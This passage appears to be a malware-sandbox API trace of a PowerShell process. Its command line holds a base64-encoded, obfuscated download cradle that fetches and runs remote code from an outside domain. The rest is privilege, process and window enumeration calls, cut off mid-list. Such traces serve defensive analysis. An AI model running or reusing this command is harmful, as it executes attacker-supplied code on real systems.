	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 727
	os_tid = 0x165c

	[0465.235] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68
	[0829.522] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0836.564] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0836.564] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0836.564] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0836.564] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0916.819] GetVersionExW (in: lpVersionInformation=0x24dda0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24dda0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0916.821] GetVersionExW (in: lpVersionInformation=0x24dda0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24dda0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0916.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0917.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0917.407] GetVersionExW (in: lpVersionInformation=0x24db10*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24db10*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0917.408] SetErrorMode (uMode=0x1) returned 0x1
	[0917.409] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x24dc70 | out: lpFileInformation=0x24dc70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0917.410] SetErrorMode (uMode=0x1) returned 0x1
	[0917.413] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x24dee0 | out: lpdwHandle=0x24dee0) returned 0x94c
	[0917.415] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d772f0 | out: lpData=0x2d772f0) returned 1
	[0917.418] VerQueryValueW (in: pBlock=0x2d772f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24de58, puLen=0x24de50 | out: lplpBuffer=0x24de58*=0x2d7738c, puLen=0x24de50) returned 1
	[0917.420] lstrlenW (lpString="䅁") returned 1
	[0917.430] VerQueryValueW (in: pBlock=0x2d772f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x24ddc8, puLen=0x24ddc0 | out: lplpBuffer=0x24ddc8*=0x2d77468, puLen=0x24ddc0) returned 1
	[0917.431] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0917.434] CoTaskMemAlloc (cb=0x2e) returned 0x53eee0
	[0917.434] lstrcpyW (in: lpString1=0x53eee0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0917.435] CoTaskMemFree (pv=0x53eee0) 
	[0917.435] VerQueryValueW (in: pBlock=0x2d772f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x24ddc8, puLen=0x24ddc0 | out: lplpBuffer=0x24ddc8*=0x2d774bc, puLen=0x24ddc0) returned 1
	[0917.435] lstrlenW (lpString="System.Management.Automation") returned 28
	[0917.435] CoTaskMemAlloc (cb=0x3c) returned 0x4ad670
	[0917.435] lstrcpyW (in: lpString1=0x4ad670, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0917.435] CoTaskMemFree (pv=0x4ad670) 
	[0917.435] VerQueryValueW (in: pBlock=0x2d772f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x24ddc8, puLen=0x24ddc0 | out: lplpBuffer=0x24ddc8*=0x2d77518, puLen=0x24ddc0) returned 1
	[0917.435] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0917.435] CoTaskMemAlloc (cb=0x20) returned 0x2063af0
	[0917.435] lstrcpyW (in: lpString1=0x2063af0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0917.435] CoTaskMemFree (pv=0x2063af0) 
	[0917.436] VerQueryValueW (in: pBlock=0x2d772f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x24ddc8, puLen=0x24ddc0 | out: lplpBuffer=0x24ddc8*=0x2d77558, puLen=0x24ddc0) returned 1
	[0917.436] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0917.436] CoTaskMemAlloc (cb=0x44) returned 0x4ad670
	[0917.436] lstrcpyW (in: lpString1=0x4ad670, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0917.436] CoTaskMemFree (pv=0x4ad670) 
	[0917.436] VerQueryValueW (in: pBlock=0x2d772f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x24ddc8, puLen=0x24ddc0 | out: lplpBuffer=0x24ddc8*=0x2d775c0, puLen=0x24ddc0) returned 1
	[0917.436] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0917.436] CoTaskMemAlloc (cb=0x76) returned 0x4c2eb0
	[0917.436] lstrcpyW (in: lpString1=0x4c2eb0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0917.436] CoTaskMemFree (pv=0x4c2eb0) 
	[0917.436] VerQueryValueW (in: pBlock=0x2d772f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x24ddc8, puLen=0x24ddc0 | out: lplpBuffer=0x24ddc8*=0x2d7765c, puLen=0x24ddc0) returned 1
	[0917.436] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0917.436] CoTaskMemAlloc (cb=0x44) returned 0x4ad670
	[0917.436] lstrcpyW (in: lpString1=0x4ad670, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0917.436] CoTaskMemFree (pv=0x4ad670) 
	[0917.436] VerQueryValueW (in: pBlock=0x2d772f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x24ddc8, puLen=0x24ddc0 | out: lplpBuffer=0x24ddc8*=0x2d776c0, puLen=0x24ddc0) returned 1
	[0917.436] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0917.437] CoTaskMemAlloc (cb=0x58) returned 0x4e3b20
	[0917.437] lstrcpyW (in: lpString1=0x4e3b20, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0917.437] CoTaskMemFree (pv=0x4e3b20) 
	[0917.437] VerQueryValueW (in: pBlock=0x2d772f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x24ddc8, puLen=0x24ddc0 | out: lplpBuffer=0x24ddc8*=0x2d7773c, puLen=0x24ddc0) returned 1
	[0917.437] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0917.437] CoTaskMemAlloc (cb=0x20) returned 0x2063af0
	[0917.437] lstrcpyW (in: lpString1=0x2063af0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0917.437] CoTaskMemFree (pv=0x2063af0) 
	[0917.437] VerQueryValueW (in: pBlock=0x2d772f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x24ddc8, puLen=0x24ddc0 | out: lplpBuffer=0x24ddc8*=0x2d773e4, puLen=0x24ddc0) returned 1
	[0917.437] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0917.437] CoTaskMemAlloc (cb=0x66) returned 0x538070
	[0917.437] lstrcpyW (in: lpString1=0x538070, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0917.437] CoTaskMemFree (pv=0x538070) 
	[0917.438] VerQueryValueW (in: pBlock=0x2d772f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x24ddc8, puLen=0x24ddc0 | out: lplpBuffer=0x24ddc8*=0x0, puLen=0x24ddc0) returned 0
	[0917.438] VerQueryValueW (in: pBlock=0x2d772f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x24ddc8, puLen=0x24ddc0 | out: lplpBuffer=0x24ddc8*=0x0, puLen=0x24ddc0) returned 0
	[0917.438] VerQueryValueW (in: pBlock=0x2d772f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x24ddc8, puLen=0x24ddc0 | out: lplpBuffer=0x24ddc8*=0x0, puLen=0x24ddc0) returned 0
	[0917.438] VerQueryValueW (in: pBlock=0x2d772f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24dd98, puLen=0x24dd90 | out: lplpBuffer=0x24dd98*=0x2d7738c, puLen=0x24dd90) returned 1
	[0918.074] CoTaskMemAlloc (cb=0x204) returned 0x4c6ee0
	[0918.074] VerLanguageNameW (in: wLang=0x0, szLang=0x4c6ee0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0918.076] CoTaskMemFree (pv=0x4c6ee0) 
	[0918.076] VerQueryValueW (in: pBlock=0x2d772f0, lpSubBlock="\\", lplpBuffer=0x24dde8, puLen=0x24dde0 | out: lplpBuffer=0x24dde8*=0x2d77318, puLen=0x24dde0) returned 1
	[0918.082] GetCurrentProcessId () returned 0x1658
	[0918.100] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x24cd10 | out: lpLuid=0x24cd10*(LowPart=0x14, HighPart=0)) returned 1
	[0918.103] GetCurrentProcess () returned 0xffffffffffffffff
	[0918.104] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x24cd30 | out: TokenHandle=0x24cd30*=0x2d4) returned 1
	[0918.105] AdjustTokenPrivileges (in: TokenHandle=0x2d4, DisableAllPrivileges=0, NewState=0x2d7ab68*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0918.106] CloseHandle (hObject=0x2d4) returned 1
	[0918.808] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1658) returned 0x2d4
	[0918.818] EnumProcessModules (in: hProcess=0x2d4, lphModule=0x2d7abd0, cb=0x200, lpcbNeeded=0x24dd48 | out: lphModule=0x2d7abd0, lpcbNeeded=0x24dd48) returned 1
	[0918.820] GetModuleInformation (in: hProcess=0x2d4, hModule=0x13f370000, lpmodinfo=0x2d7ae40, cb=0x18 | out: lpmodinfo=0x2d7ae40*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0918.821] CoTaskMemAlloc (cb=0x804) returned 0x2064b90
	[0918.822] GetModuleBaseNameW (in: hProcess=0x2d4, hModule=0x13f370000, lpBaseName=0x2064b90, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0918.822] CoTaskMemFree (pv=0x2064b90) 
	[0918.823] CoTaskMemAlloc (cb=0x804) returned 0x2064b90
	[0918.823] GetModuleFileNameExW (in: hProcess=0x2d4, hModule=0x13f370000, lpFilename=0x2064b90, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0918.823] CoTaskMemFree (pv=0x2064b90) 
	[0918.824] CloseHandle (hObject=0x2d4) returned 1
	[0918.835] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x1658) returned 0x2d4
	[0918.836] GetExitCodeProcess (in: hProcess=0x2d4, lpExitCode=0x24de78 | out: lpExitCode=0x24de78*=0x103) returned 1
	[0918.845] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12d7b088, Length=0x20000, ResultLength=0x24de40 | out: SystemInformation=0x12d7b088, ResultLength=0x24de40*=0x4a5f0) returned 0xc0000004
	[0919.691] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12d9b0b8, Length=0x4cdf0, ResultLength=0x24de40 | out: SystemInformation=0x12d9b0b8, ResultLength=0x24de40*=0x4a5a0) returned 0x0
	[0919.732] EnumWindows (lpEnumFunc=0x2be66ac, lParam=0x0) returned 1
	[0919.733] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x4d0
	[0919.733] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x558
	[0919.734] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x4d0
	[0919.734] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x4d0
	[0919.734] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x4d0
	[0919.734] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x538
	[0919.734] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x4d0
	[0919.734] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x778
	[0919.734] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x778
	[0919.734] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x4d0
	[0919.735] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x4d0
	[0919.735] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x4d0
	[0919.735] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x4d0
	[0919.735] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x4d0
	[0919.735] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x4d0
	[0919.735] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x4d0
	[0919.735] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x4d0
	[0919.735] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x460
	[0919.735] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x4d0
	[0919.736] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x4d0
	[0919.736] GetWindowThreadProcessId (in: hWnd=0x10bd6, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x2440
	[0919.736] GetWindowThreadProcessId (in: hWnd=0x10bb6, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x24d8
	[0919.736] GetWindowThreadProcessId (in: hWnd=0x10ba8, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1aa4
	[0919.736] GetWindowThreadProcessId (in: hWnd=0x10b74, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1ff0
	[0919.736] GetWindowThreadProcessId (in: hWnd=0x10b66, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1a84
	[0919.736] GetWindowThreadProcessId (in: hWnd=0x10b62, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1fb0
	[0919.737] GetWindowThreadProcessId (in: hWnd=0x10b5e, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1e10
	[0919.737] GetWindowThreadProcessId (in: hWnd=0x10b52, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x23a8
	[0919.737] GetWindowThreadProcessId (in: hWnd=0x20b46, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1f24
	[0919.737] GetWindowThreadProcessId (in: hWnd=0x20b3c, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x21ec
	[0919.737] GetWindowThreadProcessId (in: hWnd=0x20b32, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x2320
	[0919.737] GetWindowThreadProcessId (in: hWnd=0x10b28, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1fd4
	[0919.737] GetWindowThreadProcessId (in: hWnd=0x10b0c, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1880
	[0919.737] GetWindowThreadProcessId (in: hWnd=0x10af6, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1b18
	[0919.738] GetWindowThreadProcessId (in: hWnd=0x10aea, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1d6c
	[0919.738] GetWindowThreadProcessId (in: hWnd=0x10ade, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x233c
	[0919.738] GetWindowThreadProcessId (in: hWnd=0x10ad2, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x2368
	[0919.738] GetWindowThreadProcessId (in: hWnd=0x10ace, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x2124
	[0919.738] GetWindowThreadProcessId (in: hWnd=0x10aca, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x22f0
	[0919.738] GetWindowThreadProcessId (in: hWnd=0x10ac4, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x22ac
	[0919.738] GetWindowThreadProcessId (in: hWnd=0x30932, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1cdc
	[0919.739] GetWindowThreadProcessId (in: hWnd=0x308c2, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x10f0
	[0919.739] GetWindowThreadProcessId (in: hWnd=0x10ab6, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1f18
	[0919.739] GetWindowThreadProcessId (in: hWnd=0x10ab4, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x20a8
	[0919.739] GetWindowThreadProcessId (in: hWnd=0x10a78, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x2004
	[0919.739] GetWindowThreadProcessId (in: hWnd=0x10a68, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1f88
	[0919.739] GetWindowThreadProcessId (in: hWnd=0x10a4a, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1f84
	[0919.739] GetWindowThreadProcessId (in: hWnd=0x20a3e, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x2050
	[0919.739] GetWindowThreadProcessId (in: hWnd=0x40528, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1e04
	[0919.739] GetWindowThreadProcessId (in: hWnd=0x20816, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1ecc
	[0919.740] GetWindowThreadProcessId (in: hWnd=0x10a2c, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1e64
	[0919.740] GetWindowThreadProcessId (in: hWnd=0x2056e, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1b58
	[0919.740] GetWindowThreadProcessId (in: hWnd=0x10a1e, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1e94
	[0919.740] GetWindowThreadProcessId (in: hWnd=0x10a0e, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1e28
	[0919.740] GetWindowThreadProcessId (in: hWnd=0x10a0a, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1df8
	[0919.740] GetWindowThreadProcessId (in: hWnd=0x10a06, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1da8
	[0919.740] GetWindowThreadProcessId (in: hWnd=0x3060a, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1c70
	[0919.740] GetWindowThreadProcessId (in: hWnd=0x109ec, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x163c
	[0919.741] GetWindowThreadProcessId (in: hWnd=0x109de, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1a10
	[0919.741] GetWindowThreadProcessId (in: hWnd=0x109c4, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x186c
	[0919.741] GetWindowThreadProcessId (in: hWnd=0x109b4, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1d74
	[0919.741] GetWindowThreadProcessId (in: hWnd=0x1099a, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x4c8
	[0919.741] GetWindowThreadProcessId (in: hWnd=0x1098c, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1960
	[0919.741] GetWindowThreadProcessId (in: hWnd=0x1097c, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1ce4
	[0919.741] GetWindowThreadProcessId (in: hWnd=0x1093c, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1b24
	[0919.741] GetWindowThreadProcessId (in: hWnd=0x20942, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x14e0
	[0919.742] GetWindowThreadProcessId (in: hWnd=0x204b0, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x17f0
	[0919.742] GetWindowThreadProcessId (in: hWnd=0x10952, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x854
	[0919.742] GetWindowThreadProcessId (in: hWnd=0x10950, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1268
	[0919.742] GetWindowThreadProcessId (in: hWnd=0x1094e, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1624
	[0919.742] GetWindowThreadProcessId (in: hWnd=0x1094c, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1b9c
	[0919.742] GetWindowThreadProcessId (in: hWnd=0x1094a, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x16f4
	[0919.742] GetWindowThreadProcessId (in: hWnd=0x10948, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x145c
	[0919.742] GetWindowThreadProcessId (in: hWnd=0x1093e, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x17d0
	[0919.742] GetWindowThreadProcessId (in: hWnd=0x206ba, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1d28
	[0919.743] GetWindowThreadProcessId (in: hWnd=0x1093a, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0xcb8
	[0919.743] GetWindowThreadProcessId (in: hWnd=0x20614, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1190
	[0919.743] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x3a8
	[0919.743] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1bd0
	[0919.743] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1bfc
	[0919.743] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1a78
	[0919.743] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1b90
	[0919.743] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0x24dba0 | out: lpdwProcessId=0x24dba0) returned 0x1b04
